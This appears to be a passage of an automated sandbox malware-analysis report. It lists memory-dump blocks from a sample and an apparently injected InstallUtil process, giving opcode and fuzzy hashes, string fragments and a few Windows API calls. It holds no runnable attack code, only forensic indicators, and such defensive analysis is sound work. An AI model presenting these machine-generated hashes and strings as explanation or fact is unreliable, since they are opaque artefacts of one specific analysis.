                                • Opcode Fuzzy Hash: 312d789f7717ed47bea6365f93f3d7a20c71aec3c8b98cfa776586db76a1515d
                                • Instruction Fuzzy Hash: E641E4B4E0520E9FDB04CFAAC5855AEFBF2EF89310F24C16AC405E7215E7349A518F95
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6494f94f3c1e3e5f96bf84ab120b689ac5532957b5009e14986f379d5ff278c0
                                • Instruction ID: 4eb971c8b4e21fd7f5ff654b1ce51547ff6558a1e9f65c2c89acaa1651b58222
                                • Opcode Fuzzy Hash: 6494f94f3c1e3e5f96bf84ab120b689ac5532957b5009e14986f379d5ff278c0
                                • Instruction Fuzzy Hash: 7041D4B0E0520EDFCB04CFAAC5855AEFBB2AF99300F24C569C405A7215D7349A418F95
                                Memory Dump Source
                                • Source File: 00000000.00000002.2704368226.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 06010000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6010000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d56b3ea4e1c8a859b01ea6e2b4b89021aed5c7fbfefa95985c45230d15c7a3aa
                                • Instruction ID: 3a94e6d1b25d622bc91b3fb0af51d9b04425488d19333d348b04b186dfb585c5
                                • Opcode Fuzzy Hash: d56b3ea4e1c8a859b01ea6e2b4b89021aed5c7fbfefa95985c45230d15c7a3aa
                                • Instruction Fuzzy Hash: 0021D67245A3829FC752DF74D8149827FF59F6B33036848ADD8C0CF052E6654856DB51
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 89d66a2baf8b8e9e54519a91135b4a6e23b06c7d716bab905a8785229bc6c3ea
                                • Instruction ID: bb7463dd6f041c98c009686b662bf7986f9958665021a226e25478abc049ade9
                                • Opcode Fuzzy Hash: 89d66a2baf8b8e9e54519a91135b4a6e23b06c7d716bab905a8785229bc6c3ea
                                • Instruction Fuzzy Hash: 2511FCB1E016188BEB48CF6B98446DEFBF3EFC9200F14C17AC808A6265DB3405568F51
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: \;]q$\;]q$\;]q$\;]q
                                • API String ID: 0-2351511683
                                • Opcode ID: ed219d215c6015f5088aea66c453cd732a7374ea717c7b6548bc09463a277ee5
                                • Instruction ID: 068597aad3cfb53ea21cb94a814f2701f09c689b1d61b401c128cbe487b8e2a5
                                • Opcode Fuzzy Hash: ed219d215c6015f5088aea66c453cd732a7374ea717c7b6548bc09463a277ee5
                                • Instruction Fuzzy Hash: A9018F717401198FC7688E2DC484A36B7EAEFC9A60725456AEA05CB3F0EB31DC45C790

                                Execution Graph

                                Execution Coverage: 10.7%
                                Dynamic/Decrypted Code Coverage: 100%
                                Signature Coverage: 0%
                                Total number of Nodes: 21
                                Total number of Limit Nodes: 4
                                [Execution graph image: 21 nodes, entry nodes at 109c1c0 and 1097e30; API calls shown on the graph: DuplicateHandle, GlobalMemoryStatusEx]
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: X\-$'e\-$.Z\-$5X\-$<[\-$?e\-$@[\-$Nj\-$SZ\-$YX\-$[[\-$zZ\-$ze\-$$]q$$]q$$]q$$]q$$]q$X\-$Z\-$j\-
                                • API String ID: 0-3537301711
                                • Opcode ID: d639fe4f18f3c679d0db13b95e0551c5549444b1f3f9472e4b367829e8fd25ae
                                • Instruction ID: d63b67d9a25ef20beea6c40acd6ac5b6c2ba921af7d102130d3751b07832dde2
                                • Opcode Fuzzy Hash: d639fe4f18f3c679d0db13b95e0551c5549444b1f3f9472e4b367829e8fd25ae
                                • Instruction Fuzzy Hash: CAE26B30E002198FDB64DB68C894AADB7F2FF85310F5585A9D809AB365EB70ED85CF41

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                [Control-flow graph image: function entry block 675c410-675c42e]
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: Ls\-$Ss\-$ms\-$|s\-$$]q$$]q$r\-
                                • API String ID: 0-2238049251
                                • Opcode ID: ea7a9dc76aac6ceb3eec50941cf559e831951b68327583eac3a01ef6c3c0b210
                                • Instruction ID: 7145508a5f6282f6fdea8ccab84a061d6bcad7c0f49fd3ebdf74e72c5939482f
                                • Opcode Fuzzy Hash: ea7a9dc76aac6ceb3eec50941cf559e831951b68327583eac3a01ef6c3c0b210
                                • Instruction Fuzzy Hash: CC02CC30B0020A9FDB59DBB8D4907AEB7E2EF84254F15C469D80AEB395DBB4DC46C781
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1646ca7cde855ccfbcc98c63ef12ae1a5a54941760399f2f640358fb926fc399
                                • Instruction ID: 3c273e3615c2aa38a34d49ec7b4dff3acb2aaf0cc8d0d0c13b573277e1c1aacc
                                • Opcode Fuzzy Hash: 1646ca7cde855ccfbcc98c63ef12ae1a5a54941760399f2f640358fb926fc399
                                • Instruction Fuzzy Hash: 1D63F631D10B1A8ACB51EB68C8846A9F7B1FF99300F11D79AE45877121FB70AAD4CF81
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: $
                                • API String ID: 0-3993045852
                                • Opcode ID: 7d04d92a23959dfd39bb3db8f4c09660cac40e38a7623fc784dd746976c657b2
                                • Instruction ID: 7e0baf407dc596a2d7de4adba7cbe05a5a237d613ff230ba84275d3d218ad23d
                                • Opcode Fuzzy Hash: 7d04d92a23959dfd39bb3db8f4c09660cac40e38a7623fc784dd746976c657b2
                                • Instruction Fuzzy Hash: 0822CE31E00249DFDB64DFA4C4806AEB7F2EF85310F2584AADA49AB344DB75DD42CB91

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                [Control-flow graph image: function entry block 675f7a0-675f7be]
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: 'J\-$CH\-$VJ\-$WH\-$[H\-$|J\-$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                • API String ID: 0-3957607802
                                • Opcode ID: 6aaeab8caea19bba9946839a573bf5ab79e0a7479bd28999c4b2a4dc63bd7c5a
                                • Instruction ID: 532d60dd22282c77df84188a429249546b7c71d90b83feba211006b91684bfa4
                                • Opcode Fuzzy Hash: 6aaeab8caea19bba9946839a573bf5ab79e0a7479bd28999c4b2a4dc63bd7c5a
                                • Instruction Fuzzy Hash: 77E17230F0020A9FDF68DFA8D8906AEB7F6FF85210F118569D805EB354DB789846CB81

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                [Control-flow graph image: function entry block 675d918-675d93d]
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: /t\-$7w\-$Ot\-$~w\-$$]q$$]q$$]q$$]q$u\-
                                • API String ID: 0-2036382028
                                • Opcode ID: 049b4d2f94642b55dfd02f88b07009d0ba9f2ce6f1da62a2a8ebf4273a5898fe
                                • Instruction ID: c92c57a89271084f406fed3386a92397818694666049b4d5d3f196e2793e9525
                                • Opcode Fuzzy Hash: 049b4d2f94642b55dfd02f88b07009d0ba9f2ce6f1da62a2a8ebf4273a5898fe
                                • Instruction Fuzzy Hash: CFC1EC70E0021A9FDB65DF65C8A17EEB7F2BF84340F1085A9C849A7354DA709E858F92

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                [Control-flow graph image: function entry block 675d916-675d93d]
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: /t\-$7w\-$Ot\-$~w\-$$]q$$]q$u\-
                                • API String ID: 0-1014627357
                                • Opcode ID: c493b34d9e7608bd0580400b265367b3fd48c32e614b8545cb384ec27fcab3f1
                                • Instruction ID: 8e2c5499fe459e4e0cd5709ea7a891afd87f5c2337aaeceab626997ca0f62821
                                • Opcode Fuzzy Hash: c493b34d9e7608bd0580400b265367b3fd48c32e614b8545cb384ec27fcab3f1
                                • Instruction Fuzzy Hash: 0491D970E002199FDB65DBA4D8A1BEDB7F2BF48350F1084A9C40DA7354DA705E85CF92
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: 'C\-$6C\-$@\-
                                • API String ID: 0-4261662283
                                • Opcode ID: 27646f3ffe46b94e79059d26a5895ca183ad65a105c663b6e580a8e3987a5bfa
                                • Instruction ID: af2ce2df329ae00d652dd8be85c6866a71e9794a05e11a731a07b4d2d5744871
                                • Opcode Fuzzy Hash: 27646f3ffe46b94e79059d26a5895ca183ad65a105c663b6e580a8e3987a5bfa
                                • Instruction Fuzzy Hash: C2A18E30A002049FCB68DB68C554A7DB7F2EF84754F55C5A9D81AAB350DBB5EC86CB80
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: 9^\-$P_\-$Y_\-
                                • API String ID: 0-50222206
                                • Opcode ID: 8456c2755eef1e64ace85dc36ff0e969a2fdd34dd64318ff914ba99e5a418f9f
                                • Instruction ID: 98f8139e65bcc85068778c1d9b26e6d04e304d64a1887891929492a79a6d1315
                                • Opcode Fuzzy Hash: 8456c2755eef1e64ace85dc36ff0e969a2fdd34dd64318ff914ba99e5a418f9f
                                • Instruction Fuzzy Hash: 51817030B0021A5BDB58DFB8C4647AE76F6EF88344F118469D80AEB384EE74DC468792
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: 9^\-$P_\-$Y_\-
                                • API String ID: 0-50222206
                                • Opcode ID: 2e8356dad02d5ac2cdde7173313f2588178879d47f723c04b8fa81b008d14d11
                                • Instruction ID: 02141b9dbf7263259825963c8db089f2e7c0704fa147f29e13b6871b46419f1c
                                • Opcode Fuzzy Hash: 2e8356dad02d5ac2cdde7173313f2588178879d47f723c04b8fa81b008d14d11
                                • Instruction Fuzzy Hash: 36816030B0021A5BDB58DFB8C4647AE76F7EF88354F118469D80AEB385EE74DC468792
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: fbq$XPbq$\Obq
                                • API String ID: 0-4057264190
                                • Opcode ID: b1215d87094b73098cbde3ebb629a608035122e59a2d712f97165ba52323b263
                                • Instruction ID: c2bc894d5c33ec19e31753b22a354502674e37994f928719b48d8ed0d755cbbd
                                • Opcode Fuzzy Hash: b1215d87094b73098cbde3ebb629a608035122e59a2d712f97165ba52323b263
                                • Instruction Fuzzy Hash: 3D519470F001199FEB649BA4C8547BEBAF6FF88740F108469E506EB394DEB44D059B92
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: fbq$XPbq
                                • API String ID: 0-2292610095
                                • Opcode ID: 63531394da9a77ced81e5dd38f7b95e7231b85203e9103811e338f3a726fddaa
                                • Instruction ID: c1bc3ef0773c6e09fe0f2e8412cc8f4413ebdf9ced9b02b82f9814cc083d5ad8
                                • Opcode Fuzzy Hash: 63531394da9a77ced81e5dd38f7b95e7231b85203e9103811e338f3a726fddaa
                                • Instruction Fuzzy Hash: CC41B670B001199FEB549FA4C864BAE7AF7EF84740F108569E545EB3D4DEB48C018B92
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: CY\-$RY\-
                                • API String ID: 0-1908491093
                                • Opcode ID: 9f02a03719250ce1f5da59c73395dc0f4cf50bff6d6956bce60a24030cb5d0e4
                                • Instruction ID: 5e011e2716b4304236f5704f376fd8d312d0cdc67c11e3d3d306648cb9744bef
                                • Opcode Fuzzy Hash: 9f02a03719250ce1f5da59c73395dc0f4cf50bff6d6956bce60a24030cb5d0e4
                                • Instruction Fuzzy Hash: 7D41BE71F002199FDB54DFA8C4417EEBBF5EB48760F108069E849E7380DB749942CBA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: 'C\-$6C\-
                                • API String ID: 0-952170732
                                • Opcode ID: 41d82da21955cb39f7d89ad942b6d08debb5fbc8e842602cb4076de3f7113603
                                • Instruction ID: c61f9ce02f9d62cb9a835f91616bb5e86db20ecee0e97b8c21aba3300a73666b
                                • Opcode Fuzzy Hash: 41d82da21955cb39f7d89ad942b6d08debb5fbc8e842602cb4076de3f7113603
                                • Instruction Fuzzy Hash: 3C316731F00118AFCF85DBB8D8756BD7BB2EF80250F0281A6D805EB245DA60DD06C792
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: CY\-$RY\-
                                • API String ID: 0-1908491093
                                • Opcode ID: 2cf20fc141e129eb49cc858fa4cc9948bbccc610ec89f45575413ccf079448eb
                                • Instruction ID: 012f80dcd032d714999a8e98ca28f10c844684a1658a8ee919d582e21f421a59
                                • Opcode Fuzzy Hash: 2cf20fc141e129eb49cc858fa4cc9948bbccc610ec89f45575413ccf079448eb
                                • Instruction Fuzzy Hash: 62319371F0011A5FDF54DBB884517EEB6F5AB48660F15C0A9D909F7380EA74CD02CBA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: Px\-$hx\-
                                • API String ID: 0-2001300283
                                • Opcode ID: c4a8b63df2a45fb7339e12ca5c62e2eb21729c742f456b36e31cddbcae1964f9
                                • Instruction ID: e1c796155e443a3f522c99db621de7f5e327203a7ce13faaac2e1e16054fb3b6
                                • Opcode Fuzzy Hash: c4a8b63df2a45fb7339e12ca5c62e2eb21729c742f456b36e31cddbcae1964f9
                                • Instruction Fuzzy Hash: 0A110231F041040BDF6196BCE85137E7BF2DFCA224F2284AAE90EDB350DA64CD014382
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: Px\-$hx\-
                                • API String ID: 0-2001300283
                                • Opcode ID: 8f07987138e9a808acb7c4a3e69e5ee1ca89f021526708692a76b99a048313fa
                                • Instruction ID: e8340b9c9fc0f84180303fd581697a9dc152ab9ea1a59ef4002747725c950af7
                                • Opcode Fuzzy Hash: 8f07987138e9a808acb7c4a3e69e5ee1ca89f021526708692a76b99a048313fa
                                • Instruction Fuzzy Hash: 1E01FD30B002081BDF64A6BCD86573E72E6DFCA610F208829E90ECB350EE60DD0243C2
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292236886.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_66d0000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f3363f6ff18f0f04ce9dac6ba3217049a188dbcc8ad84b147c8753a21a17adac
                                • Instruction ID: 7a7c6274eef6f1285321f890e298f71e1c36fe886572b7985778fbd9a801d813
                                • Opcode Fuzzy Hash: f3363f6ff18f0f04ce9dac6ba3217049a188dbcc8ad84b147c8753a21a17adac
                                • Instruction Fuzzy Hash: D5413671D043959FCB14CF79D8046AEBFF5EF89310F14856AE408A7251EB789840CBE1
                                Memory Dump Source
                                • Source File: 00000004.00000002.3286413123.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1090000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 28b9103aa7010ce95310c2eb4c3dd8312481f9457b1dcc7392cb94f15dc1634b
                                • Instruction ID: 6bf252614216bebcfb98434d0cc8480318853975ef4a35a8f72c25dddcfa0feb
                                • Opcode Fuzzy Hash: 28b9103aa7010ce95310c2eb4c3dd8312481f9457b1dcc7392cb94f15dc1634b
                                • Instruction Fuzzy Hash: DD41A079A403419FF715EFA5E855B693FEBFB94340F10846EEA059B3C9CA744805CB60
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0109C247
                                Memory Dump Source
                                • Source File: 00000004.00000002.3286413123.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1090000_InstallUtil.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 935088a50477dda0b37f739e6251a7d07b0c25b7fef98444c51bf3f61dd6bfb0
                                • Instruction ID: 3a68bf3eb92e5f1cbfc1e3dbcac496eb3312ca56dbb62444df91aa8635467275
                                • Opcode Fuzzy Hash: 935088a50477dda0b37f739e6251a7d07b0c25b7fef98444c51bf3f61dd6bfb0
                                • Instruction Fuzzy Hash: AC314AB59012089FDB10CF9AD945ADEBFF8FF48310F10806AE958A7210D7749944DFA0
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0109C247
                                Memory Dump Source
                                • Source File: 00000004.00000002.3286413123.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1090000_InstallUtil.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 27ef0cfb1a2bbb1f1787ec4a46137d386aeff0276539ccab5c24d2f4f11e26dc
                                • Instruction ID: 899d32a31edaadb1ab078dcde75d6727f3f946046ddf43b178639f8d89e90293
                                • Opcode Fuzzy Hash: 27ef0cfb1a2bbb1f1787ec4a46137d386aeff0276539ccab5c24d2f4f11e26dc
                                • Instruction Fuzzy Hash: 5621E2B5D002489FDB10CFAAD984ADEBFF9FB48310F14805AE918A3310D378A940CFA0
                                APIs
                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,066D4672), ref: 066D475F
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292236886.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_66d0000_InstallUtil.jbxd
                                Similarity
                                • API ID: GlobalMemoryStatus
                                • String ID:
                                • API String ID: 1890195054-0
                                • Opcode ID: 5b11c02956b96b79dcd122753743cc82ab520ff2a3b469090e8219dfe3d5285e
                                • Instruction ID: b893c8ce977272f021a78c79b79ddb1331706f90592e348259de02cb37fe7328
                                • Opcode Fuzzy Hash: 5b11c02956b96b79dcd122753743cc82ab520ff2a3b469090e8219dfe3d5285e
                                • Instruction Fuzzy Hash: 371133B1C00659ABDB10DFAAC844ADEFBF4FF48310F10816AE818A7240D778A940CFE1
                                APIs
                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,066D4672), ref: 066D475F
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292236886.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_66d0000_InstallUtil.jbxd
                                Similarity
                                • API ID: GlobalMemoryStatus
                                • String ID:
                                • API String ID: 1890195054-0
                                • Opcode ID: 43db37d382aeafe3dcbdefe14d43c08053ab911fe23f6b0cb67f5968a5ef4b72
                                • Instruction ID: d0bbefdcc4ddbc301d42d671dde8568342bc1584e2f5e1f9885c018a4611c294
                                • Opcode Fuzzy Hash: 43db37d382aeafe3dcbdefe14d43c08053ab911fe23f6b0cb67f5968a5ef4b72
                                • Instruction Fuzzy Hash: 141112B1C006599BDB10DF9AC544BAEFBF4FF48320F11816AE818A7240D778A950CFE5
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: PH]q
                                • API String ID: 0-3168235125
                                • Opcode ID: a88c38c81d4a3368fc4fb6cd90ca20d80149548cab64619d6071a296c0fbf487
                                • Instruction ID: 8070566e40c9f3f4d7c157ea3c9f152fdf42abe361ea4265c666682c86a07141
                                • Opcode Fuzzy Hash: a88c38c81d4a3368fc4fb6cd90ca20d80149548cab64619d6071a296c0fbf487
                                • Instruction Fuzzy Hash: 37416730B002055FDB49AB74C4246AF3BE6EF85250F1584B9E446DB399DE79CD06CBE1
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: PH]q
                                • API String ID: 0-3168235125
                                • Opcode ID: e962260504416ce07be5903135141e83a92a7c9d35541c5fb275d895b376e684
                                • Instruction ID: f58ba416b5e220a7ef8d6369b850a9f7dcc80cd9805a706519e21b8683f99230
                                • Opcode Fuzzy Hash: e962260504416ce07be5903135141e83a92a7c9d35541c5fb275d895b376e684
                                • Instruction Fuzzy Hash: 57311430B002059FDB58AB78C42066E76E7AFC8250F61847DE406DB399DE79DD42CB91
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: Px\-
                                • API String ID: 0-3816466299
                                • Opcode ID: 0b3d65dd4037994fbc3e00214767b47f446dc547ec6b3f62e0744bcff91f44af
                                • Instruction ID: 631890018775cf3c299608696bc5fb21323142d26eefbe93850dda76510f317b
                                • Opcode Fuzzy Hash: 0b3d65dd4037994fbc3e00214767b47f446dc547ec6b3f62e0744bcff91f44af
                                • Instruction Fuzzy Hash: BE31F531F102194BDB54AEB9D8502EEB7E6EFC4710F11857AE90AE7344EE74DE418391
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: $]q
                                • API String ID: 0-1007455737
                                • Opcode ID: 221e3b5cbdcf6450d25105760dde2059c8923373b5313eef171f39175de0fde6
                                • Instruction ID: 957df482b5f58e68f279c46d5404858df006fe2a3eee9e75d5c249151636953d
                                • Opcode Fuzzy Hash: 221e3b5cbdcf6450d25105760dde2059c8923373b5313eef171f39175de0fde6
                                • Instruction Fuzzy Hash: 2601A731F002159B9F5AD598A59137C76E5EB80590F1680AECD09DB245DEB5CD068391
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: \Obq
                                • API String ID: 0-2878401908
                                • Opcode ID: e049928bced17d3750339e7f9c854c3dc1279c055a5d92e1721314369c526fc6
                                • Instruction ID: 43932d6ede1b870bc46991856b61e340466525c2daddfe99a619c822fee02d57
                                • Opcode Fuzzy Hash: e049928bced17d3750339e7f9c854c3dc1279c055a5d92e1721314369c526fc6
                                • Instruction Fuzzy Hash: 4DF0FE70A10129DFDB14EF94E859BAD7B76FF88705F204159E502A7394CBB41C42DF81
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8738c97cc5c0b8820529a8f9cebd049bfc5c80f0cb476715b929430c1d887f3f
                                • Instruction ID: df6b583ccdaf3e95cfa27faae3b2d87c996119f3842c237c66acca2b416ea8a1
                                • Opcode Fuzzy Hash: 8738c97cc5c0b8820529a8f9cebd049bfc5c80f0cb476715b929430c1d887f3f
                                • Instruction Fuzzy Hash: 45A1F170B002169FDB55CB68C880A3EB7A6FF84360F1185A9D856CB3A5EB75EC42C791
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e0c48f9b3ed24b278fcbbfe39290e684c7751ded21ec0d611aecd4683b61e365
                                • Instruction ID: 0af50de26041dca0c5389170b37eda1077a275cb5f7e90f1a4a428861f531947
                                • Opcode Fuzzy Hash: e0c48f9b3ed24b278fcbbfe39290e684c7751ded21ec0d611aecd4683b61e365
                                • Instruction Fuzzy Hash: 4A61A171F000114FDF54AA7EC880A6FAADBAFD4224B254579D80EDB364DEB5DD0287D2
                                Memory Dump Source
